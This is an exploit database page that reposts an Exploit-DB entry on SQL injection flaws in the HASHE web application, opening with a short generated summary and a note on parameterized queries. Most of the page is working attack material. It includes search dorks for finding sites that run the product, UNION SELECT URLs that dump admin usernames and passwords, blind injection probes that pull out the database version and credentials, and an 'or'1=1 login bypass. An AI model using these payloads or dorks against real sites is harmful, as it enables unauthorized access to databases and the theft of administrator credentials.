header-logo
Suggest Exploit
vendor:
HASHE
by:
AtT4CKxT3rR0r1ST
8,8
CVSS
HIGH
Sql Injection
89
CWE
Product Name: HASHE
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

HASHE! Multiple Sql Injection Vulnerability

HASHE! Multiple Sql Injection Vulnerability is a vulnerability that allows an attacker to inject malicious SQL code into a vulnerable web application. The attacker can use this vulnerability to gain access to sensitive data, such as user credentials, or to modify the data stored in the database. The vulnerability can be exploited by sending specially crafted SQL queries to the vulnerable web application. The attacker can also use the vulnerability to bypass authentication and gain access to the application's administrative functions.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries. This will ensure that the user input is properly sanitized and that the application is not vulnerable to SQL injection attacks.
Source

Exploit-DB raw data:

HASHE! Multiple Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Team           : Sec Attack Team
.:. Home           : www.sec-attack.com/vb
.:. Script         : HASHE
.:. Bug Type       : Sql Injection[Mysql]
.:. Dork           : [1] "Powered By HASHE"
                     [2] "Powered By HASHE!"
                     [3] "Powered By Hashe Computer Solutions"

####################################################################

    Sql Injection [MYSQL]

===[ Exploit ]===

www.site.com/home.php?id=37[Sql Injection]
www.site.com/home.php?id=37/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat(username,0x3a,password),7/**/from/**/admin


www.site.com/bar_detail.php?id=null[Sql Injection]
www.site.com/bar_detail.php?id=null'/**/and/**/1=2/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/**/from/**/admin-- -

    Sql Injection [Blind]

===[ Exploit ]===

www.site.com/propertydetails.php?Id=null[BLIND]

www.site.com/propertydetails.php?Id=null+and+1=1   >>>  True
www.site.com/propertydetails.php?Id=null+and+1=2   >>>  False

www.site.com/propertydetails.php?Id=null+and+substring(@@version,1,1)=4   >>>   True
www.site.com/propertydetails.php?Id=null+and+substring(@@version,1,1)=5   >>>   False

www.site.com/propertydetails.php?Id=null+and+(select substring(concat(1,concat(name,0x3a,password)),1,1) from admin limit 0,1)=1

    Sql Injection [Auth Bypass]

===[ Exploit ]===

www.site.com/admin/

Bug Type: Bar Manager
Username: 'or'1=1
Passowrd: 'or'1=1

http://server/admin/



Script Site:

http://server/home.php?id=37/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,group_concat%28username,0x3a,password%29,7/**/from/**/admin

####################################################################

Navigation

Suggest Exploit

Services By CQR